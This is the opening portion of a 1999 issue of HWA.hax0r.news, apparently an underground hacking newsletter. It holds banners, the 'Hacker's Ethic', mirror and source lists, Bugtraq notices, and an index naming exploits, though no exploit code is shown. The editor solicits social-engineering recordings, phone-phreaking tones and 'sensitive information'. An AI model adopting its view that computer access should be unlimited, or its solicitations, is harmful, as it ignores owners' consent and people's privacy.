    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99=]                         Number 39 Volume 1 1999 Oct 24th  99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================

                         "ABUSUS NON TOLLIT USUM"
                         
  ==========================================================================                         
  
       Today the spotlight may be on you, some interesting machines that
                   have accessed these archives recently...
  
                             
                             
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
   
                     http://welcome.to/HWA.hax0r.news/                     
                     
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
        Web site sponsored by CUBESOFT networks http://www.csoft.net
        check them out for great fast web hosting!
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       

     The Hacker's Ethic

     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a pejorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer.
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.


  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
               A Comment on FORMATTING: 
               
               
               Oct'99 - Started 80 column mode format, code is still left
                        untouched since formatting will destroy syntax.               
               
   
               I received an email recently about the formatting of this
               newsletter, suggesting that it be formatted to 75 columns
               in the past I've endeavoured to format all text to 80 cols
               except for articles and site statements and urls which are
               posted verbatim, I've decided to continue with this method
               unless more people complain, the zine is best viewed in
               1024x768 mode with UEDIT.... - Ed
    
                       
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
                       


     New mirror sites
                
                http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
                http://net-security.org/hwahaxornews
                http://www.sysbreakers.com/hwa
                http://www.attrition.org/hosted/hwa/
                http://www.ducktank.net/hwa/issues.html.
                http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
                http://hwazine.cjb.net/
                http://www.hackunlimited.com/files/secu/papers/hwa/
                http://www.attrition.org/~modify/texts/zines/HWA/
                
              * http://hwa.hax0r.news.8m.com/           
              * http://www.fortunecity.com/skyscraper/feature/103/  
               
              * Crappy free sites but they offer 20M & I need the space...
              ** Some issues are not located on these sites since they exceed
                 the file size limitations imposed by the sites :-( please
                 only use these if no other recourse is available.
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.ducktank.net/hwa/issues.html. ** NEW **
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa. *DOWN*
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=         
   
   
  
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended however, to complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, it's a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #39

   =-----------------------------------------------------------------------=


    
    We could use some more people joining the channel, it's usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you it's for ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***
    *******************************************************************


  =--------------------------------------------------------------------------=
  
  Issue #39
  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................
            
   `ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and 
   loosely translated it means "Just because something is abused, it should 
   not be taken away from those who use it properly." This is our new motto.

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Exploit for Openlink's web configurator for Linux/glibc2.........
    04.0  .. sco_cancel.c yields egid=18(lp) Tested on SCO 5.0.5+Skunkware98..
    05.0  .. Smail + RPMmail Exploit..........................................
    06.0  .. ftpspy, ftp exploit..............................................
    07.0  .. A vulnerability exists in the /usr/lib/merge/dos7utils program...
    08.0  .. SCO OpenServer symlink vulnerability (Brock Tellier).............
    09.0  .. GREX  cyberspace.org - Free shell access.........................
    10.0  .. Shamrock Says it Was All A Lie ..................................
    11.0  .. China Fortifies Cyber Defenses ..................................
    12.0  .. Amnesty Program for Pirated Software Fails Miserably ............
    13.0  .. A New Look at InfoWar ...........................................
    14.0  .. Another Security Challenge ......................................
    15.0  .. University Shutdown After Attack ................................
    16.0  .. More Melissa Strains ............................................
    17.0  .. Loyalty Cards are Not As Private As People Think ................
    18.0  .. Interview With the Cult of the Dead Cow .........................
    19.0  .. Amazon.com Hosts Crypto Challenge ...............................
    20.0  .. Web Sites Cause Crime, Report Says ..............................
    21.0  .. China to Use Viruses During War .................................
    22.0  .. Call for Public Security Database ...............................
    23.0  .. GAO Calls for Security Laws .....................................
    24.0  .. RingZero Still on the Loose .....................................
    25.0  .. MTV Called Inexcusable By ITC ...................................
    26.0  .. Bush Web Site Defaced ...........................................
    27.0  .. Space Rogue, Editor of HNN, on ABC News Webcast Today ...........
    28.0  .. 20% of Hosts in Singapore Vulnerable ............................
    29.0  .. Zambia's First Computer Crime Trial .............................
    30.0  .. Russian Infowar Debunked ........................................
    31.0  .. Distributed Coordinated Attacks .................................
    32.0  .. Possible Network Intrusion Scenario .............................
    33.0  .. Intrusion Detection Provides A Pound Of Prevention ..............
    34.0  .. Advanced buffer overflow exploit Written by Taeho Oh.............
    35.0  .. UK Gov. Given Lifetime Menace Award .............................
    36.0  .. DOD Sys Admins Need Top Secret Clearance ........................
    37.0  .. Singapore Tough on Cyber Crime ..................................
    38.0  .. Student Poses as Teacher for Prank ..............................
    39.0  .. Axent Makes Outrageous Claims ...................................
    40.0  .. Where Do We Stand With Crypto ...................................
    41.0  .. Customs Service Uses Web to Catch Crooks ........................
    42.0  .. Virus and Marines Fight It Out In the Pentagon ..................
    43.0  .. LAPD Abuse Wiretapping Power ....................................
    44.0  .. Three Blind Men Await Trial in Israel For Computer Crime ........
    45.0  .. ARM Target of Cyber Attack ......................................
    46.0  .. Military Unit Formed For Domestic Deployment ....................
    47.0  .. cDc Interview Posted On Slashdot ................................
    48.0  .. Buffer Overflow in Communicator May Allow Code to Run ...........
    49.0  .. Listserver hacked................................................
    50.0  .. Skewl: "How a Netmask Works" By Steven Lee.......................
    51.0  .. More proxies supplied by IRC 4 ALL...............................
    52.0  .. Perl source for a webspoofing HTTP grabber.......................
    53.0  .. MACMILLAN USA MOVES TO SECURE LINUX..............................
    54.0  .. ANONYMOUS REMAILERS..............................................
    55.0  .. PROJECT GAMMA STILL DOWN.........................................
    56.0  .. PRIVATE DESKTOP..................................................
    57.0  .. Y2K RELATED DISASTER.............................................
    58.0  .. ANTI-MS SOFTWARE.................................................
    59.0  .. HOTMAIL: ANOTHER VULNERABILITY, THE SOAP CONTINUES...............
    60.0  .. Books: Hacking Exposed: Network Security Secrets and Solutions ..
    61.0  .. Microsoft Java Virtual Machine Class Cast Vulnerability..........
    62.0  .. OmniHTTPD Buffer Overflow Vulnerability..........................
    63.0  .. Linux cwdtools Vulnerabilities...................................
    64.0  .. WU-Ftpd NEW DoS vulnerability....................................
    65.0  .. Axent Raptor Denial of Service Vulnerability.....................
    66.0  .. RedHat screen pty(7) Vulnerability...............................
    67.0  .. Microsoft Excel File Import Macro Execution Vulnerability........
    68.0  .. Checkpoint Firewall-1 LDAP Authentication Vulnerability..........           
    69.0  .. Microsoft Excel SYLK Macro Execution Vulnerability...............
    70.0  .. Wu-ftpd message Buffer Overflow Vulnerability....................
    71.0  .. Tribal Voice PowWow Password Vulnerabilities.....................
    72.0  .. RedHat lpr/lpd Vulnerabilities...................................
    73.0  .. Gauntlet Firewall Rules Bypass Vulnerability.....................
    74.0  .. Microsoft IE5 Javascript URL Redirection Vulnerability...........
    75.0  .. OpenLink 3.2 Remote Buffer Overflow Vulnerability................
    76.0  .. RedHat PAM NIS Locked Accounts Vulnerability.....................
    77.0  .. Microsoft IE5 IFRAME Vulnerability...............................
    78.0  .. SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability.............
    79.0  .. ARE VIRUSES Y2K COMPLIANT?.......................................
    80.0  .. COMPUTER SECURITY AT CENTER OF DOE PROBLEMS......................
    81.0  .. US REVISITS SOURCE CODE LIMITS...................................
    82.0  .. SECURITY FOR AD-HOC WIRELESS NETWORKS............................
    83.0  .. GOV'T IT EXECS SEEK SOFTWARE ACCOUNTABILITY......................
    84.0  .. DEFAULT #7 OUT...................................................
    85.0  .. UK POLICE GETTING THE POWER TO TAP E-MAIL?.......................
    86.0  .. WASHINGTON DIVIDED ON NET SIGNATURES BILL........................
    87.0  .. FEDS STILL HAVING TROUBLE FINDING CYBERSECURITY..................
    88.0  .. CALIFORNIA TAKES DIGITAL SIGNATURES INTO USE.....................
    89.0  .. AMAZON'S CRYPTO CONTEST CRACKED WITHIN HOURS.....................
    90.0  .. SANS: CYBERSECURITY RISKS REAL ..................................
    91.0  .. "INTERVIEW" WITH MISTUH CLEAN....................................
    92.0  .. Inside Happy Hacker Oct 20th.....................................
    93.0  .. Security Focus Newsletter........................................
    94.0  .. THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2.........
    
      
    =-------------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: POSTPONED til further notice, place: TBA..........
    Ha.Ha .. Humour and puzzles  ............................................
              
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if it's good enough for CNN it's good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



 00.1 CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       

    Websites;
    
    sAs72.......................: http://members.tripod.com/~sAs72/
    Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

    @HWA



 00.2 Sources ***
      ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/  *DOWN*
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
        

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html


    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list's charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector address
    if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus will also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to others that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits,
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well as links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         from our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

    ISSN 1004-042X

    Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
    News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
    Archivist: Brendan Kehoe
    Poof Reader: Etaion Shrdlu, Jr.
    Shadow-Archivists: Dan Carosone / Paul Southworth
                       Ralph Sims / Jyrki Kuoppala
                       Ian Dickinson
    Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occurred, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
